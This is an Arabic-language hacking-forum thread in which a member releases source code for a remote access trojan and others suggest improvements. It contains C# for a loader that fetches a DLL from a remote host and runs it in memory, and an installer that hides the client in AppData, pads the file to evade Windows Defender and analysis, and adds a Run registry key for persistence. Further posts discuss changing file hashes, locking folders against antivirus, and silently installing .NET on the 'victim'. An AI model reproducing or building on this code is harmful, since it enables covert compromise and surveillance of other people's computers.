[ سورس ] NYAN LOADER - طريقة بناء RAT - موضوع للنقاش والتطوير


  • الـلـهـم انـصـر اخـوانـنـا الـمـسـلـمـيـن فـي بـورمـا وكـن مـعـهـم يـاربـاه يـاربـاه

NYAN CAT

ᴄᴀғғᴇɪɴᴇ ᴅᴇᴘᴇɴᴅᴇɴᴄᴇ
8 يناير 2019
353
895
Kuwait
github.com
0
السلام عليكم




اطرح برنامج رات بخصائص بدائية بحيث ننقاش طريقة تطويره للأفضل وإضافة الخواص التي نريدها لمن يهوى تطوير الرات وليس البوت نت.

سأحاول شرح المشروع بشكل سريع.


يوجد 3 مشاريع
1- Client - هو برنامج العميل الذي سوف يتصل بالسيرفر.
2- Server - هو برنامج المتحكم
3- Packets - هي مكتبة تحتوي على الأوامر المشتركة بين الكلاينت والسيرفر + مكتبة السيريالزيشن. وسوف يتم اضافتها إلى المشروعين تلقائياً عن طريق ILmerge من غير تدخلك.


Packets


سوف نعتمد على ارسال الكلاس بأكملة بدلاً من استخدام الطرق التقليدية (Convert.FromBase64String) (System.Text.Encoding.UTF8.GetBytes). فلو أردنا ارسال التبليغ إلى السيرفر:
C#:
Send(new PacketIdentification() { Username = Environment.UserName, OperatingSystem = new ComputerInfo().OSFullName, Version = "0.1" });
التعامل بهذا الشكل مع الأوامر أسهل وأسرع وأفضل من التقسيم لأنك تتعامل مع كائن وليس String مقسم.

طبعاً المشروع لم أجلس عليه بصورة طويلة بل كنت متقطع وأخصص له وقت قليل كل يوم. فأحببت أن أنشر ما توصل إليه على أن أضيف بعض اقتراحاتكم أو تعديلاتكم أو كلاساتكم إلى المشروع.


في المرفقات المشروع كامل + المكتبات. فقط عليك ضغط على F5 ليتم عميل كومبايل قبل أن تفتح المشروع. يجب أن يكون لديك فيجوال ستديو 2019

الباسورد nyan


آخر تحديث للمشروع في المرفقات 8/16/2019



 

المرفقات

التعديل الأخير:

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,568
2,964
1
المبدع نيان تخصص اللعب بالرات مثل مايريد ..انا كان تخصصي البايتات خخخ ..
ماشاء الله عليك .بالنسبة للافكار الجديدة بالرات ..
بالنسبة لجهة الكلاينت مااحب كل الفانكشنس يكونو فيه . حلو يكون بلاجنس يتم ارسالهم من المتحكم عند الطلب
او تشغيلهم بالذاكرة ..
  • احب يكون فيه طرق تثبيت جديدة قديمة بس مش معتمدة
  • مثل ملفات الــMof "تشغيل كود ما عند بدء ايفينت معينة" ..
  • او التثبيت من خلال السيرفيسس "اعتقد كانت مشكلتها ان مشاهدة شاشة حاسب المستخدم غير ممكنة بس مش مقتنع ليش هيك بصير"
  • اضافة خيار لتكبير حجم الكلاينت بجهاز المستخدم "عشان مايتم ارساله للتحليل" ممكن عمله 500 ميجا مثلا ..
  • اضافة خيار لقفل مجلد ما على المستخدم والحمايات "اقصد موضوعي حماية مجلد الكلاينت" والهدف ايضا عدم مقدرة الحمايات على حذف الملف او ارساله للتحليل
  • اضافة خيار قفل مفتاح ما بالريجيستري ايضا اقصد موضوعي خخخ
  • بذكر لسا شي 10 افكار بس تابع كلامي التالي :
صراحة كل شي ممكن اطلبه من مواضيعي بغض النظر ان احد مسويها قبلي او لا .. بس انا اشوف لو احد بيسوي رات مبنية على بعض مواضيعي بيكون رات بخصائص جديدة وحلوة ومميزة
مش لان مواضيعي لا ..مثلا فكرة زيادة حجم الملف هية فكرة امير بس انا نفذتها لان امير كانت اوضاعه صعبة وقتها
لو مستعد انك تنفذ تطلعاتي للرات خبرني عشان اقول لك عليهم واعطيك روابط المواضيع ..مابدي اكتب بالاخير مايصير مثل مابدي خخخ
انا مااريدك تسوي راتات تقليدية .. ولو اختلفت بفكرة مميزة مثل اللي هنا او مثل فكرة ارسال البايتات لتنفيذها من خلال اللودر اللي بيكون بجهاز المستخدم
نعم الفكرة ذيك طرحتها انا قبل كم شهر سواءا ارسال ران بي او ارسال الكلاينت ..الخ بس انت قلت لي انها مش منتشرة كانت كثير
واعتقد الرات الخاص بك اللي نزل من شي شهر كان اول رات يعتمد الفكرة هذه ..
المهم كلامي انه اريد رات كامل جديد بكافة جوانبه مش فكرة واحدة يونيك بكل رات ..
لا نريد رات قوي جامع افكار ومواضيع الكثيرين بالديف وهنا ..لو جاهز ابشر بغرقك افكار ومواضيع بس انت ضيفها ههه ..


C#:
    private static void Main()
        {
Assembly.Load(Microsoft("http://192.168.2.101/Client.dll").Result)
.GetType("Client.Networking.NyanClient").GetMethod("InitializeClient")?.Invoke(null, null);
            Application.Run();
        }
        public static async Task<byte[]> Microsoft(string url)
        {
            using (var client = new HttpClient())
            {
                var result = await client.GetByteArrayAsync(url); return result;
            }
        }
 
التعديل الأخير:
  • أعجبني
التفاعلات: Capony، NYAN CAT و panda

NYAN CAT

ᴄᴀғғᴇɪɴᴇ ᴅᴇᴘᴇɴᴅᴇɴᴄᴇ
8 يناير 2019
353
895
Kuwait
github.com
0
المبدع نيان تخصص اللعب بالرات مثل مايريد ..انا كان تخصصي البايتات خخخ ..
ماشاء الله عليك .بالنسبة للافكار الجديدة بالرات ..
بالنسبة لجهة الكلاينت مااحب كل الفانكشنس يكونو فيه . حلو يكون بلاجنس يتم ارسالهم من المتحكم عند الطلب
او تشغيلهم بالذاكرة ..
  • احب يكون فيه طرق تثبيت جديدة قديمة بس مش معتمدة
  • مثل ملفات الــMof "تشغيل كود ما عند بدء ايفينت معينة" ..
  • او التثبيت من خلال السيرفيسس "اعتقد كانت مشكلتها ان مشاهدة شاشة حاسب المستخدم غير ممكنة بس مش مقتنع ليش هيك بصير"
  • اضافة خيار لتكبير حجم الكلاينت بجهاز المستخدم "عشان مايتم ارساله للتحليل" ممكن عمله 500 ميجا مثلا ..
  • اضافة خيار لقفل مجلد ما على المستخدم والحمايات "اقصد موضوعي حماية مجلد الكلاينت" والهدف ايضا عدم مقدرة الحمايات على حذف الملف او ارساله للتحليل
  • اضافة خيار قفل مفتاح ما بالريجيستري ايضا اقصد موضوعي خخخ
  • بذكر لسا شي 10 افكار بس تابع كلامي التالي :
صراحة كل شي ممكن اطلبه من مواضيعي بغض النظر ان احد مسويها قبلي او لا .. بس انا اشوف لو احد بيسوي رات مبنية على بعض مواضيعي بيكون رات بخصائص جديدة وحلوة ومميزة
مش لان مواضيعي لا ..مثلا فكرة زيادة حجم الملف هية فكرة امير بس انا نفذتها لان امير كانت اوضاعه صعبة وقتها
لو مستعد انك تنفذ تطلعاتي للرات خبرني عشان اقول لك عليهم واعطيك روابط المواضيع ..مابدي اكتب بالاخير مايصير مثل مابدي خخخ
انا مااريدك تسوي راتات تقليدية .. ولو اختلفت بفكرة مميزة مثل اللي هنا او مثل فكرة ارسال البايتات لتنفيذها من خلال اللودر اللي بيكون بجهاز المستخدم
نعم الفكرة ذيك طرحتها انا قبل كم شهر سواءا ارسال ران بي او ارسال الكلاينت ..الخ بس انت قلت لي انها مش منتشرة كانت كثير
واعتقد الرات الخاص بك اللي نزل من شي شهر كان اول رات يعتمد الفكرة هذه ..
المهم كلامي انه اريد رات كامل جديد بكافة جوانبه مش فكرة واحدة يونيك بكل رات ..
لا نريد رات قوي جامع افكار ومواضيع الكثيرين بالديف وهنا ..لو جاهز ابشر بغرقك افكار ومواضيع بس انت ضيفها ههه ..


C#:
    private static void Main()
        {
Assembly.Load(Microsoft("http://192.168.2.101/Client.dll").Result)
.GetType("Client.Networking.NyanClient").GetMethod("InitializeClient")?.Invoke(null, null);
            Application.Run();
        }
        public static async Task<byte[]> Microsoft(string url)
        {
            using (var client = new HttpClient())
            {
                var result = await client.GetByteArrayAsync(url); return result;
            }
        }

يعطيك العافيه ودائماً ردودك ننتظرها ونتعلم منها :159:

"بالنسبة لجهة الكلاينت مااحب كل الفانكشنس يكونو فيه"
ممكن عمل نظام بلوقن ولكن سيكون حجم البلوقنات كبير بسبب وجوب توفر مكتبة ProtoBuf بحجم 250 ك.ب تقريباً. علماً أني بحثت في Guithub عن مكتبات بنفس المستوى لتعمل على 4.0 ولكن لم أجد فأغلب المكتبات تطلب 4.5 وأعلى. لو توفرت مكتبة صغيرة الحجم فممكن التعديل على المشروع لتناسبه.

عموماً المكتبة الحاليه ممتازة جداً وصاحب المكتبة شخص رائع يرد على أي استفسار بصدر رحب.

في النسخة النهائية الكلاينت سيكون على شكل مكتبة ، ويتم انشاء ملف لودر عن طريق مكتبة كودوم ووظيفة هذا اللودر فقط استدعاء الكلاينت من الريسوس يعني فقط سطر واحد، لضمان سهولة التشفير واضافة Junks ...ألخ.

"طرق تثبيت جديدة"
التثبيت يأخذ أكثر من شكل وآليه. سوف أعتمد بعض الطرق مثل إضافة 1 بايت إلى الملف ليعطي Hash مختلف في كل مرة يتم التشغيل فيها لتشتيت الحماية عند الفحص لكي لا يطابق الداتا بيس الخاص بها. وكما ذكرت أيضاً ممكن زيادة حجم الملف بصورة ضخمة وهي فعاله ضد ويندوز ديفندر.

"خيار لقفل مجلد + بالريجيستري "
أعتقد أني رأيت موضوعك منذ مدة ، فكرة ممتازة ولكن أعتقد تتطلب تصريح أليس كذلك؟ وأشعر بأنها خاصية تناسب برامج التشفير وليس الرات "كذلك فكرة زيادة 1 بايت + زيادة الحجم"
 

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,568
2,964
1
يعطيك العافيه ودائماً ردودك ننتظرها ونتعلم منها :159:

"بالنسبة لجهة الكلاينت مااحب كل الفانكشنس يكونو فيه"
ممكن عمل نظام بلوقن ولكن سيكون حجم البلوقنات كبير بسبب وجوب توفر مكتبة ProtoBuf بحجم 250 ك.ب تقريباً. علماً أني بحثت في Guithub عن مكتبات بنفس المستوى لتعمل على 4.0 ولكن لم أجد فأغلب المكتبات تطلب 4.5 وأعلى. لو توفرت مكتبة صغيرة الحجم فممكن التعديل على المشروع لتناسبه.

عموماً المكتبة الحاليه ممتازة جداً وصاحب المكتبة شخص رائع يرد على أي استفسار بصدر رحب.

في النسخة النهائية الكلاينت سيكون على شكل مكتبة ، ويتم انشاء ملف لودر عن طريق مكتبة كودوم ووظيفة هذا اللودر فقط استدعاء الكلاينت من الريسوس يعني فقط سطر واحد، لضمان سهولة التشفير واضافة Junks ...ألخ.

"طرق تثبيت جديدة"
التثبيت يأخذ أكثر من شكل وآليه. سوف أعتمد بعض الطرق مثل إضافة 1 بايت إلى الملف ليعطي Hash مختلف في كل مرة يتم التشغيل فيها لتشتيت الحماية عند الفحص لكي لا يطابق الداتا بيس الخاص بها. وكما ذكرت أيضاً ممكن زيادة حجم الملف بصورة ضخمة وهي فعاله ضد ويندوز ديفندر.

"خيار لقفل مجلد + بالريجيستري "
أعتقد أني رأيت موضوعك منذ مدة ، فكرة ممتازة ولكن أعتقد تتطلب تصريح أليس كذلك؟ وأشعر بأنها خاصية تناسب برامج التشفير وليس الرات "كذلك فكرة زيادة 1 بايت + زيادة الحجم"
الله يسامحك لابتتعلم مني ولاشي ..
المهم وين كنا .. زيادة بايت عند كل مرة تشغيل ايضا فكرة جميلة حتى يتغير الهاش .. جميع الطرق تؤدي لروما .. ففكرة زيادة الحجم او قفل المجلد او مفتاح ما بالريجيستري"بالمناسبة مابدهم صلاحيات ادمن" كلهم بيوصلو لفكرة
انه صار شي جديد بالرات مش مثل البقية ..
بس فكرة زيادة 1 بايت للملف لن تجعله اعتقد بمنأى عن ارساله للمختبرات لتحليله .. الفكرة الاضمن زيادة حجم الملف اعتقد .. بالنهاية هو قرارك ..
بالنسبة لبقية الافكار بطرحها بس اقدر ان شاء الله .. وانت اعلم مني صراحة بالاحسن عمله .. ولكن اللي اريده كمحصلة انه مايكون رات تقليدي رغم تميز بعض الافكار هنا بالرات اللي تريد طرحه او رغم تميز الراتات اللي قبلها اللي طرحتها .. ولكنها ليست كما اتمنى انه يكون شي تقدر تقول عنه اوه افكار الرات كثيرة جديدة "في رات" ممكن تكون قديمة ك افكار في مواضيع .. ولكن في رات اضمن لك انه مااحد سواها ..
على كل فيه افكار كثيرة مثل فكرة تشغيل الملف بالتاسك منجر بامتدادادت مختلفة مثل dll,bin,etc نزلت ايضا موضوع كيف ومابدها صلاحيات ادمن ..
افكار كثيرة جدا اخي نيان .. انا اتمنى انك تطلع على المحتوى القديم للمواضيع بالديف بالاخص مواضيعي وشو تشوف منها مناسب سويه ب راتك ..
بس ان اردت انك تحط اي فكرة من افكاري وكانت هالفكرة اكيد مااحد نزلها قبلي او حكي فيها قول تكرما بعض افكار الرات هنا من شخص لايقبل استخدامها في معصية
"اعرف والله انو اغلب اللي بيستخدمو الرات بيستخدموه في معصية بس اللي عليي اقول لهم تعلمو استفادو منه وانا بريء من اي استخدام في معصية"
المهم وين كنا ,, حابب يكون عندك رات جامع لافكار الكثيرين .. ورح يكون بجد متميز اضمن لك انه رح ينشهر اكثر من كوازا رات .. ممكن تقول لي يابشار طحت بعيد ..
بقلك لو ضمنت تقريب 30 فكرة جديدة بالرات بمختلف المجالات يعني شي افكار عشان التشفيرة تستمر افكار عشان الملف ماينرسل للفحص افكار للتثبيت افكار لتمويه الملف "مثل انه يظهر بامتداد مختلف بالتاسك منجر وغيرها ..
والكثير لسا من اللي لسا ماذكرته .. لو عملت بكل مجال كم فكرة وتركت المستخدم يختار الطريقة اللي يحبها رح يكون رات مميز اضمن لك ذلك
مثلا كفكرة لحماية الملف من ارساله للتحليل .. ممكن الاغلبية يحبو زيادة حجم الملف وممكن الاغلبية يحبو فكرة زيادة بايت وممكن الاغلبية يحبو فكرة قفل المجلد ومسار التثبيت بالريجيستري انه ينقفل
يعني ماتدري وش يحب المستخدمين لهيك لازم كل الطرق تكون متوافرة والمستخدم يبني الكلاينت على ذوقه ..مانحن منحدد هالشي مناسب اكثر للتشفير لو لا ..
هذا رايي
 
  • أعجبني
التفاعلات: Mr.Ali و NYAN CAT

NYAN CAT

ᴄᴀғғᴇɪɴᴇ ᴅᴇᴘᴇɴᴅᴇɴᴄᴇ
8 يناير 2019
353
895
Kuwait
github.com
0
الله يسامحك لابتتعلم مني ولاشي ..
المهم وين كنا .. زيادة بايت عند كل مرة تشغيل ايضا فكرة جميلة حتى يتغير الهاش .. جميع الطرق تؤدي لروما .. ففكرة زيادة الحجم او قفل المجلد او مفتاح ما بالريجيستري"بالمناسبة مابدهم صلاحيات ادمن" كلهم بيوصلو لفكرة
انه صار شي جديد بالرات مش مثل البقية ..
بس فكرة زيادة 1 بايت للملف لن تجعله اعتقد بمنأى عن ارساله للمختبرات لتحليله .. الفكرة الاضمن زيادة حجم الملف اعتقد .. بالنهاية هو قرارك ..
بالنسبة لبقية الافكار بطرحها بس اقدر ان شاء الله .. وانت اعلم مني صراحة بالاحسن عمله .. ولكن اللي اريده كمحصلة انه مايكون رات تقليدي رغم تميز بعض الافكار هنا بالرات اللي تريد طرحه او رغم تميز الراتات اللي قبلها اللي طرحتها .. ولكنها ليست كما اتمنى انه يكون شي تقدر تقول عنه اوه افكار الرات كثيرة جديدة "في رات" ممكن تكون قديمة ك افكار في مواضيع .. ولكن في رات اضمن لك انه مااحد سواها ..
على كل فيه افكار كثيرة مثل فكرة تشغيل الملف بالتاسك منجر بامتدادادت مختلفة مثل dll,bin,etc نزلت ايضا موضوع كيف ومابدها صلاحيات ادمن ..
افكار كثيرة جدا اخي نيان .. انا اتمنى انك تطلع على المحتوى القديم للمواضيع بالديف بالاخص مواضيعي وشو تشوف منها مناسب سويه ب راتك ..
بس ان اردت انك تحط اي فكرة من افكاري وكانت هالفكرة اكيد مااحد نزلها قبلي او حكي فيها قول تكرما بعض افكار الرات هنا من شخص لايقبل استخدامها في معصية
"اعرف والله انو اغلب اللي بيستخدمو الرات بيستخدموه في معصية بس اللي عليي اقول لهم تعلمو استفادو منه وانا بريء من اي استخدام في معصية"
المهم وين كنا ,, حابب يكون عندك رات جامع لافكار الكثيرين .. ورح يكون بجد متميز اضمن لك انه رح ينشهر اكثر من كوازا رات .. ممكن تقول لي يابشار طحت بعيد ..
بقلك لو ضمنت تقريب 30 فكرة جديدة بالرات بمختلف المجالات يعني شي افكار عشان التشفيرة تستمر افكار عشان الملف ماينرسل للفحص افكار للتثبيت افكار لتمويه الملف "مثل انه يظهر بامتداد مختلف بالتاسك منجر وغيرها ..
والكثير لسا من اللي لسا ماذكرته .. لو عملت بكل مجال كم فكرة وتركت المستخدم يختار الطريقة اللي يحبها رح يكون رات مميز اضمن لك ذلك
مثلا كفكرة لحماية الملف من ارساله للتحليل .. ممكن الاغلبية يحبو زيادة حجم الملف وممكن الاغلبية يحبو فكرة زيادة بايت وممكن الاغلبية يحبو فكرة قفل المجلد ومسار التثبيت بالريجيستري انه ينقفل
يعني ماتدري وش يحب المستخدمين لهيك لازم كل الطرق تكون متوافرة والمستخدم يبني الكلاينت على ذوقه ..مانحن منحدد هالشي مناسب اكثر للتشفير لو لا ..
هذا رايي

كلامك جميل بخصوص اضافة الخواص وجعل المستخدم هو من يختار بدلاً من جعل الكلاينت يعمل بصورة ثابته دائماً.

فكرة زيادة الحجم سهله تطبيقها وسأحاول اضافتها عما قريب. الأفضل الآن انشاء كلاس خاص للتثبيت وفيه خيارات مثل زيادة الحجم واضافة بايت تثبيت ريجستري وقفل المجلد ...الخ. فسيكون تعاملنا مع كلاس واحد. one class to role them all

سأحاول نشره هنا قريباً لكي يتم مراجعته وتطويره قبل ارفاقه للرات.

وفكرة التشغيل بامتداد لم تمر علي. سأحاول مشاهدتها وان شاء الله مايكون سلوكها عدواني مما يسبب امساك من الحماية.
 
  • أعجبني
التفاعلات: Mr.Ali و BasharBachir

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,568
2,964
1
كلامك جميل بخصوص اضافة الخواص وجعل المستخدم هو من يختار بدلاً من جعل الكلاينت يعمل بصورة ثابته دائماً.

فكرة زيادة الحجم سهله تطبيقها وسأحاول اضافتها عما قريب. الأفضل الآن انشاء كلاس خاص للتثبيت وفيه خيارات مثل زيادة الحجم واضافة بايت تثبيت ريجستري وقفل المجلد ...الخ. فسيكون تعاملنا مع كلاس واحد. one class to role them all

سأحاول نشره هنا قريباً لكي يتم مراجعته وتطويره قبل ارفاقه للرات.

وفكرة التشغيل بامتداد لم تمر علي. سأحاول مشاهدتها وان شاء الله مايكون سلوكها عدواني مما يسبب امساك من الحماية.
تماما من مزايا انك تحط الافكار كلها انو الكلاينت مابيكون نفسه ثابت عند الكل . كل واحد بيبنيه على كيفه ..
لا اخي الحبيب الفكرة كلها اننا رح نمرر الملف للمشغل المسؤول عن عمل الامتدادات التنفيذية ومثل ماتعرف الامتداد ماله تاثير على بايتات الملف
فمارح تفرق معه سواءا كان الامتداد EXE او NYAN
تفضل هنا الموضوع .. وموجود بالمنتدى هنا ايضا ..بس ارفقت لك رابط الديف عشان الردود ممكن تفيد

https://www.dev-point.com/vb/threads/677108/
 
  • أعجبني
التفاعلات: Mr.Ali و NYAN CAT

annaba23

:: عضو جديد ::
20 نوفمبر 2018
18
28
annaba
0
لو ممكن عمل الشرح باستخدام اللختين السي شارب و vb.net حتى تعم الفائدة لكن على العموم شكرا موضوع رائع لا حبدا لو تعمقت في الشرح أكتر ووضع تعليقات بداخل السورس حول عمل كل فنكشن وفائدتها
 
  • أعجبني
التفاعلات: Mr.Ali و NYAN CAT

ViRusRat

Legend Administrator
Legend Administrator
18 نوفمبر 2018
203
258
0
مبدع يا نيان وانت ما اشتغلت عليه بشكل مطول وانت سهلت علينا قراءة الاكواد مرتب ترتيب خرافي اول مرة اشوف برنامج مرتب زي كذا شكرا لك يا نيان:]d (4)::]d (4):
 
  • أعجبني
التفاعلات: Mr.Ali و NYAN CAT

NYAN CAT

ᴄᴀғғᴇɪɴᴇ ᴅᴇᴘᴇɴᴅᴇɴᴄᴇ
8 يناير 2019
353
895
Kuwait
github.com
0
لو ممكن عمل الشرح باستخدام اللختين السي شارب و vb.net حتى تعم الفائدة لكن على العموم شكرا موضوع رائع لا حبدا لو تعمقت في الشرح أكتر ووضع تعليقات بداخل السورس حول عمل كل فنكشن وفائدتها
سآخذ اقتراحاتك بعين الإعتبار يا غالي :1 (226):
 
  • أعجبني
التفاعلات: Mr.Ali

NYAN CAT

ᴄᴀғғᴇɪɴᴇ ᴅᴇᴘᴇɴᴅᴇɴᴄᴇ
8 يناير 2019
353
895
Kuwait
github.com
0
مبدع يا نيان وانت ما اشتغلت عليه بشكل مطول وانت سهلت علينا قراءة الاكواد مرتب ترتيب خرافي اول مرة اشوف برنامج مرتب زي كذا شكرا لك يا نيان:]d (4)::]d (4):
شكراً على دعمك المتواصل حبيب ألبي :1 (226):
 
  • أحببته
  • أعجبني
التفاعلات: Mr.Ali و ViRusRat

NYAN CAT

ᴄᴀғғᴇɪɴᴇ ᴅᴇᴘᴇɴᴅᴇɴᴄᴇ
8 يناير 2019
353
895
Kuwait
github.com
0
BasharBachir

كلاس على السريع على أمل أن أكلمه قريباً (ليست النسخة النهائية). أنشره من باب تحديث النقاش.

قررت أفصل الثريد الرئيسي عن ثريد التثبيت من أجل عمل تخطي لبعض الحمايات. يعني الكلاينت سيتصل بالسيرفر ولكن التثبيت سيكون بثريد آخر في حاله خموم.

C#:
using Client.Helper;
using Client.Settings;
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Threading;
using System.Windows.Forms;

namespace Client.Installation
{
    public class Installer
    {
        public bool EnableInstall { get; set; }
        public string FileName { get; set; }
        public DirectoryInfo DirectoryName { get; set; }
        public string RegistryName { get; set; }
        public int IncreaseSize { get; set; }
        public int Sleeping { get; set; }
        //public bool IsProtected { get; set; }

        public void Run()
        {
            if (EnableInstall && !IsAlreadyInstalled())
            {
                for(int i = 0; i < Sleeping; i++)
                {
                    Thread.Sleep(1000);
                }
                CreateDirectory();
                InstallFile();
                InstallRegistry();
                ExecuteFile();
            }
            else
            {
                Config.LoaderPath = Application.ExecutablePath;
            }
        }

        public bool IsAlreadyInstalled()
        {
            if (Application.ExecutablePath == Path.Combine(DirectoryName.FullName, FileName))
                return true;
            else
                return false;
        }

        public void CreateDirectory()
        {
            if (!DirectoryName.Exists)
            {
                DirectoryName.Create();
            }
        }

        public void InstallFile()
        {
            string fullPath = Path.Combine(DirectoryName.FullName, FileName);
            if (File.Exists(fullPath))
            {
                foreach (Process process in Process.GetProcesses())
                {
                    try
                    {
                        if (process.MainModule.FileName == fullPath) process.Kill();
                    }
                    catch { }
                }
                File.Delete(fullPath);
            }
            using (FileStream fs = new FileStream(fullPath, FileMode.Create, FileAccess.Write))
            {
                byte[] b = File.ReadAllBytes(Application.ExecutablePath);
                fs.Write(b, 0, b.Length);
                if (IncreaseSize > 0)
                {
                    IncreaseSize = IncreaseSize * 1024 * 1000;
                    fs.Write(new byte[IncreaseSize], 0, IncreaseSize);
                }
            }
            Config.LoaderPath = fullPath;
        }

        public void InstallRegistry()
        {
            string fullPath = Path.Combine(DirectoryName.FullName, FileName);
            using (RegistryKey key = Registry.CurrentUser.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", RegistryKeyPermissionCheck.ReadWriteSubTree))
            {
                key.SetValue(RegistryName, "\"" + fullPath + "\"");
            }
        }

        public void ExecuteFile()
        {
            new Powershell().Run("Start-Sleep -Seconds 1; Start-Process -FilePath '" + Path.Combine(DirectoryName.FullName, FileName) + "'");
            Environment.Exit(0);
        }

    }
}


الإستخدام: (يجب استخدام الكلاينت في Ilmerge وليس الكلاينت في Deug)

C#:
            new Thread(() =>
            {
                new Installer()
                {
                    EnableInstall = true,
                    FileName = "test.exe",
                    DirectoryName = new DirectoryInfo(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Nyan")),
                    RegistryName = "test",
                    IncreaseSize = 20, //MB
                    Sleeping = 5 //SEC
                }.Run();
            }).Start();
 

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,568
2,964
1
BasharBachir

كلاس على السريع على أمل أن أكلمه قريباً (ليست النسخة النهائية). أنشره من باب تحديث النقاش.

قررت أفصل الثريد الرئيسي عن ثريد التثبيت من أجل عمل تخطي لبعض الحمايات. يعني الكلاينت سيتصل بالسيرفر ولكن التثبيت سيكون بثريد آخر في حاله خموم.

C#:
using Client.Helper;
using Client.Settings;
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Threading;
using System.Windows.Forms;

namespace Client.Installation
{
    public class Installer
    {
        public bool EnableInstall { get; set; }
        public string FileName { get; set; }
        public DirectoryInfo DirectoryName { get; set; }
        public string RegistryName { get; set; }
        public int IncreaseSize { get; set; }
        public int Sleeping { get; set; }
        //public bool IsProtected { get; set; }

        public void Run()
        {
            if (EnableInstall && !IsAlreadyInstalled())
            {
                for(int i = 0; i < Sleeping; i++)
                {
                    Thread.Sleep(1000);
                }
                CreateDirectory();
                InstallFile();
                InstallRegistry();
                ExecuteFile();
            }
            else
            {
                Config.LoaderPath = Application.ExecutablePath;
            }
        }

        public bool IsAlreadyInstalled()
        {
            if (Application.ExecutablePath == Path.Combine(DirectoryName.FullName, FileName))
                return true;
            else
                return false;
        }

        public void CreateDirectory()
        {
            if (!DirectoryName.Exists)
            {
                DirectoryName.Create();
            }
        }

        public void InstallFile()
        {
            string fullPath = Path.Combine(DirectoryName.FullName, FileName);
            if (File.Exists(fullPath))
            {
                foreach (Process process in Process.GetProcesses())
                {
                    try
                    {
                        if (process.MainModule.FileName == fullPath) process.Kill();
                    }
                    catch { }
                }
                File.Delete(fullPath);
            }
            using (FileStream fs = new FileStream(fullPath, FileMode.Create, FileAccess.Write))
            {
                byte[] b = File.ReadAllBytes(Application.ExecutablePath);
                fs.Write(b, 0, b.Length);
                if (IncreaseSize > 0)
                {
                    IncreaseSize = IncreaseSize * 1024 * 1000;
                    fs.Write(new byte[IncreaseSize], 0, IncreaseSize);
                }
            }
            Config.LoaderPath = fullPath;
        }

        public void InstallRegistry()
        {
            string fullPath = Path.Combine(DirectoryName.FullName, FileName);
            using (RegistryKey key = Registry.CurrentUser.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", RegistryKeyPermissionCheck.ReadWriteSubTree))
            {
                key.SetValue(RegistryName, "\"" + fullPath + "\"");
            }
        }

        public void ExecuteFile()
        {
            new Powershell().Run("Start-Sleep -Seconds 1; Start-Process -FilePath '" + Path.Combine(DirectoryName.FullName, FileName) + "'");
            Environment.Exit(0);
        }

    }
}


الإستخدام: (يجب استخدام الكلاينت في Ilmerge وليس الكلاينت في Deug)

C#:
            new Thread(() =>
            {
                new Installer()
                {
                    EnableInstall = true,
                    FileName = "test.exe",
                    DirectoryName = new DirectoryInfo(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Nyan")),
                    RegistryName = "test",
                    IncreaseSize = 20, //MB
                    Sleeping = 5 //SEC
                }.Run();
            }).Start();
بخصوص عملية فصل الثريد اعتقد كلامك صحيح ايضا .. مرة قالها لي نابليون "شادي"
وهاانت تكررها هنا ايضا .
عشان الكلاس جميل ولكن نريد ان نزيد عليه اضعاف مايمكنه فعله حتى الان خخخ ..
 
  • أعجبني
التفاعلات: Mr.Ali و NYAN CAT

Mr.Cyber

لا إله إلا الله
9 نوفمبر 2018
80
197
0
وعليكم السلام
فكرة حلوة + استخدام الكلاس رح تتخطى عدة حمايات لمدة مو قصيرة, النود في اوقات كثيرة يكشفهم إذا مافي تمويه,
إذا تم إضافة تشفير البيانات ثم استخدام sslstream بيصير أفضل,
إذا اسخدمت TcpClient بيكون الكود أقصر شوي بس مافي فرق طبعا هه,
من الأفضل تشفير كل String موجود بالكلاينت مثل أكواد الPowershell,
بالنسبة لزيادة الحجم لازم تنتبه على الانتشار بنفس الوقت + يتم الانتشاء بحالة الكلاينت الأصلية إذا حطيت بايتات زيادة الحجم بجزء معين من الكلاينن وتحذفها بعدين عند الانتشار بيصير أسهل
 
  • أعجبني
التفاعلات: Mr.Ali و NYAN CAT

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,568
2,964
1
فكرة ثانية لو الكلاينت كان مثلا 2.0 "اعرف حسب كتابتك رح يحتاج 4.0 ..ولكن خلنا نسوي كلاينت اولي يستخدم 2.0 فقط لو المستخدم يعرف انه "الض حية" ماعنده 4.5 او شاكك انه ماعنده
الكلاينت الاولي بيتسقبل امر واحد فقط وهو تحميل الفريم ورك 4.5 وتثبيته بشكل مخفي فقط بالروسس ستارت مرر الارجومنت التالية ومن ثم جلب وتشغيل الكلاينت الاصلي بعدها اللي بده 4.5
C#:
"dotnetfx45.exe" // مسار الفريم وورك اللي تم تحميله من قبل الكلاينت الاولي
" /q /norestart" // الارجومنت للتنفيذ بخفاء
طبعا هالشي يكون اختياري من المستخدم لو حب يستخرج الكلاينت الاولي 2.0 الي شغلته وعملته بس يحمل الفريم وورك ويثبته بخفاء ويشغل الكلاينت الاصلي بعدها اللي بده 4.5

اغلب اللي يبتعدو عن الراتات اللي بدها 4.0+ هو بسبب انه بدهم الكلاينت يكون 2.0 لخوفهم من عندم تواجد فريم ورك اعلى عند الض حية ..هيك انت بتكون كسبت الكل خخخ
 

Mr.Ali

.::الإدارة::.
طاقم الإدارة
3 يوليو 2019
99
142
0
كل رد من ردودكم فيه كمية من المعلومات تستحق ان يكون له موضوع لوحده، دائما تعجبني النقاشات لما فيها من افكار و تحدي و تشغيل للمخ :12:
 

NYAN CAT

ᴄᴀғғᴇɪɴᴇ ᴅᴇᴘᴇɴᴅᴇɴᴄᴇ
8 يناير 2019
353
895
Kuwait
github.com
0
